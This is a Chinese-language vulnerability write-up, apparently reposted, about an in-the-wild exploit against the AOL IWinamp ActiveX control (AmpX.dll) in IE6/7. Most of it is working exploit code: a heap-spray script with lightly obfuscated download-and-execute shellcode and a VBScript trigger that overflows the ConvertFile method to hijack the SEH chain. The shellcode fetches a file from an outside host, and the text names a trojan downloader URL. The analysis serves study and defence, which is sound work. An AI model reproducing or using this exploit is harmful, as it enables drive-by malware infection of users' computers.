漏洞来源页面:hxxp://bigfindtopguide.cn:8080/index.php
漏洞程序:AOL IWinampActiveX Class
文件名: AmpX.dll
版本: 2.4.0.6
CLSID:FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6
漏洞存在于: ConvertFile方式
是否已被KillBit: 否
标记为IObjectSafety: 是
Safe For Initialization (IObjectSafety): 是
Safe For Scripting (IObjectSafety): 是(即可以正常在IE加载)
预计利用度提升几率: 中(3/7)
可触发漏洞的浏览器版本: IE6/7

文章来源http://www.sacour.cn 转载保留此行

利用代码如:(请手动置换!!!为%u)(代码已简化)。
<OBJECT classid='clsid:FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6' id='IWinAmpActiveX'>
<SCRIPT>
var shellcode = unescape("!!!5350!!!5251!!!" + "5756!!!9c55!!!00" + "e8!!!0000!!!5d00" + "!!!ed83!!!310d!!!" + "64c0!!!4003!!!78" + "30!!!8b0c!!!0c40" + "!!!708b!!!ad1c!!!" + "408b!!!eb08!!!8b" + "09!!!3440!!!408d" + "!!!8b7c!!!3c40!!!" + "5756!!!5ebe!!!00" + "01!!!0100!!!bfee" + "!!!014e!!!0000!!!" + "ef01!!!d6e8!!!00" + "01!!!5f00!!!895e" + "!!!81ea!!!5ec2!!!" + "0001!!!5200!!!80" + "68!!!0000!!!ff00" + "!!!4e95!!!0001!!!" + "8900!!!81ea!!!5e" + "c2!!!0001!!!3100" + "!!!01f6!!!8ac2!!!" + "359c!!!0263!!!00" + "00!!!fb80!!!7400" + "!!!8806!!!321c!!!" + "eb46!!!c6ee!!!32" + "04!!!8900!!!81ea" + "!!!45c2!!!0002!!!" + "5200!!!95ff!!!01" + "52!!!0000!!!ea89" + "!!!c281!!!0250!!!" + "0000!!!5052!!!95" + "ff!!!0156!!!0000" + "!!!006a!!!006a!!!" + "ea89!!!c281!!!01" + "5e!!!0000!!!8952" + "!!!81ea!!!78c2!!!" + "0002!!!5200!!!00" + "6a!!!d0ff!!!056a" + "!!!ea89!!!c281!!!" + "015e!!!0000!!!ff" + "52!!!5a95!!!0001" + "!!!8900!!!81ea!!!" + "5ec2!!!0001!!!52" + "00!!!8068!!!0000" + "!!!ff00!!!4e95!!!" + "0001!!!8900!!!81" + "ea!!!5ec2!!!0001" + "!!!3100!!!01f6!!!" + "8ac2!!!359c!!!02" + "6e!!!0000!!!fb80" + "!!!7400!!!8806!!!" + "321c!!!eb46!!!c6" + "ee!!!3204!!!8900" + "!!!81ea!!!45c2!!!" + "0002!!!5200!!!95" + "ff!!!0152!!!0000" + "!!!ea89!!!c281!!!" + "0250!!!0000!!!50" + "52!!!95ff!!!0156" + "!!!0000!!!006a!!!" + "006a!!!ea89!!!c2" + "81!!!015e!!!0000" + "!!!8952!!!81ea!!!" + "a6c2!!!0002!!!52" + "00!!!006a!!!d0ff" + "!!!056a!!!ea89!!!" + "c281!!!015e!!!00" + "00!!!ff52!!!5a95" + "!!!0001!!!9d00!!!" + "5f5d!!!5a5e!!!5b" + "59!!!c358!!!0000" + "!!!0000!!!0000!!!" + "0000!!!0000!!!00" + "00!!!0000!!!0000" + "!!!6547!!!5474!!!" + "6d65!!!5070!!!74" + "61!!!4168!!!4c00" + "!!!616f!!!4c64!!!" + "6269!!!6172!!!79" + "72!!!0041!!!6547" + "!!!5074!!!6f72!!!" + "4163!!!6464!!!65" + "72!!!7373!!!5700" + "!!!6e69!!!7845!!!" + "6365!!!bb00!!!f2" + "89!!!f789!!!c030" + "!!!75ae!!!29fd!!!" + "89f7!!!31f9!!!be" + "c0!!!003c!!!0000" + "!!!b503!!!021b!!!" + "0000!!!ad66!!!85" + "03!!!021b!!!0000" + "!!!708b!!!8378!!!" + "1cc6!!!b503!!!02" + "1b!!!0000!!!bd8d" + "!!!021f!!!0000!!!" + "03ad!!!1b85!!!00" + "02!!!ab00!!!03ad" + "!!!1b85!!!0002!!!" + "5000!!!adab!!!85" + "03!!!021b!!!0000" + "!!!5eab!!!db31!!!" + "56ad!!!8503!!!02" + "1b!!!0000!!!c689" + "!!!d789!!!fc51!!!" + "a6f3!!!7459!!!5e" + "04!!!eb43!!!5ee9" + "!!!d193!!!03e0!!!" + "2785!!!0002!!!31" + "00!!!96f6!!!ad66" + "!!!e0c1!!!0302!!!" + "1f85!!!0002!!!89" + "00!!!adc6!!!8503" + "!!!021b!!!0000!!!" + "ebc3!!!0010!!!00" + "00!!!0000!!!0000" + "!!!0000!!!0000!!!" + "0000!!!0000!!!89" + "00!!!1b85!!!0002" + "!!!5600!!!e857!!!" + "ff58!!!ffff!!!5e" + "5f!!!01ab!!!80ce" + "!!!bb3e!!!0274!!!" + "edeb!!!55c3!!!4c" + "52!!!4f4d!!!2e4e" + "!!!4c44!!!004c!!!" + "5255!!!444c!!!77" + "6f!!!6c6e!!!616f" + "!!!5464!!!466f!!!" + "6c69!!!4165!!!70" + "00!!!6664!!!7075" + "!!!2e64!!!7865!!!" + "0065!!!7263!!!73" + "61!!!2e68!!!6870" + "!!!0070!!!7468!!!" + "7074!!!2f3a!!!33" + "2f!!!3863!!!722e" + "!!!3a75!!!3038!!!" + "3038!!!772f!!!6c" + "65!!!6f63!!!656d" + "!!!702e!!!7068!!!" + "693f!!!3d64!!!30" + "31!!!7726!!!0032" + "!!!9000" + "");
   var bigblock  = unescape("!!!0c0c!!!0c0c");
   var headersize = 20;
   var slackspace = headersize + shellcode.length;
   while (bigblock.length<slackspace) bigblock+=bigblock;
   var fillblock = bigblock.substring(0, slackspace);
   var block = bigblock.substring(0, bigblock.length-slackspace);
   while(block.length+slackspace<0x40000) block = block+block+fillblock;
   var memory = new Array();
   for (var i = 0; i < 666; i++){
    memory[i] = block+shellcode;
   }
</SCRIPT>
<SCRIPT language="VBScript">
Oleg=string(1400,unescape("%ff")) + string(1000,unescape("%0c"));
            IWinAmpActiveX.ConvertFile Oleg,1,1,1,1,1
            IWinAmpActiveX.ConvertFile Oleg,1,1,1,1,1
            IWinAmpActiveX.ConvertFile Oleg,1,1,1,1,1
            IWinAmpActiveX.ConvertFile Oleg,1,1,1,1,1
</SCRIPT>

大概是上方的spray之后跟着的string(1400,unescape("%ff"))建立一个字串,试图更改eax到FFFFFFFF。然后后面重复1000次的0c0c0c0c覆盖掉seh链,代码返回时执行到恶意代码上。此站点想要下载的文件是:hxxp://3c8.ru:8080/welcome.php?id=10&w2 (TR/Downloader)

此漏洞最早被发现于2009.5.13。